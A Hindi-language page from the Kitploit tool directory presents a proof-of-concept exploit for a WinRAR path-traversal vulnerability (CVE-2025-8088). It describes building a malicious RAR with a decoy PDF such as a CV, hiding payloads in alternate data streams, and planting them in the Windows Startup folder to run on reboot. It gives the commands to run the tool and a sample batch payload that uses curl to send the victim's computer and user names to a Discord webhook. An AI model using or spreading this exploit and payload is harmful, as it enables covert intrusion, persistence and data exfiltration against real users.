Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/techcorp/cve-2025-8088-exploit
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगबाइनरी शोषण
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
210 महीने पहलेअभी तक समीक्षित नहीं

विवरण

WinRAR भेद्यता (CVE-2025-8088) के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो संस्करण 7.12 और उससे निचले संस्करणों को प्रभावित करती है। यह टूल एक दुर्भावनापूर्ण RAR आर्काइव बनाता है जो पाथ ट्रैवर्सल के साथ ऑल्टरनेट डेटा स्ट्रीम्स (ADS) में पेलोड एम्बेड करता है, जिससे संभावित रूप से आर्बिट्ररी कोड एक्सीक्यूशन हो सकता है।

साझा करें

CVE-2025-8088 WinRAR एक्सप्लॉइट 🔓

WinRAR भेद्यता (CVE-2025-8088) के लिए एक proof-of-concept एक्सप्लॉइट, जो संस्करण 7.12 और उससे निचले संस्करणों को प्रभावित करता है। यह टूल एक दुर्भावनापूर्ण RAR संग्रह बनाता है जो पेलोड को ऑल्टरनेट डेटा स्ट्रीम (ADS) में पाथ ट्रैवर्सल के साथ एम्बेड करता है, जो संभावित रूप से मनमाना कोड निष्पादन की ओर ले जाता है।

  • बहुत सारे अन्य टूल्स के साथ समस्या यह है कि वे कई ADS स्ट्रीम एम्बेड नहीं करते, जिसके लिए या तो आपके पास सही पाथ ट्रैवर्सल होना चाहिए या सटीक उपयोगकर्ता नाम/निष्कर्षण निर्देशिका पता होनी चाहिए।

🚀 यह कैसे काम करता है

  1. डिकॉय दस्तावेज़ बनाता है 📄 - पेशेवर दिखने वाला PDF (CV या पेंटेस्ट रिपोर्ट) उत्पन्न करता है
  2. कई ADS स्ट्रीम एम्बेड करता है 🔄 - विभिन्न पाथ ट्रैवर्सल गहराई के साथ पेलोड स्ट्रीम संलग्न करता है
  3. RAR हेडर में हेरफेर करता है ⚙️ - पाथ ट्रैवर्सल भेद्यता का शोषण करने के लिए संग्रह संरचना को संशोधित करता है
  4. पेलोड को स्टार्टअप में डालता है 📂 - निष्कर्षण पर पेलोड को Windows स्टार्टअप फ़ोल्डर में लिखने का प्रयास करता है

🛠️ उपयोग

root@kitploit:~
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ पेलोड अनुकूलन

डिस्कॉर्ड वेबहुक को कॉल करने के लिए पेलोड संपादित करें:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

YOUR_DISCORD_WEBHOOK_URL को अपने वास्तविक वेबहुक URL से बदलें।

🔄 निष्पादन प्रवाह

  1. पीड़ित संवेदनशील WinRAR (≤7.12) के साथ RAR निकालता है
  2. पेलोड स्टार्टअप फ़ोल्डर में लिखा जाता है:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. अगले रीबूट पर ➡️ पेलोड स्वचालित रूप से निष्पादित होता है

📋 आवश्यकताएँ

  • Windows OS 🪟
  • Python 3.x 🐍
  • WinRAR स्थापित होना चाहिए
  • ReportLab लाइब्रेरी (pip install reportlab)
टूल डाउनलोड करें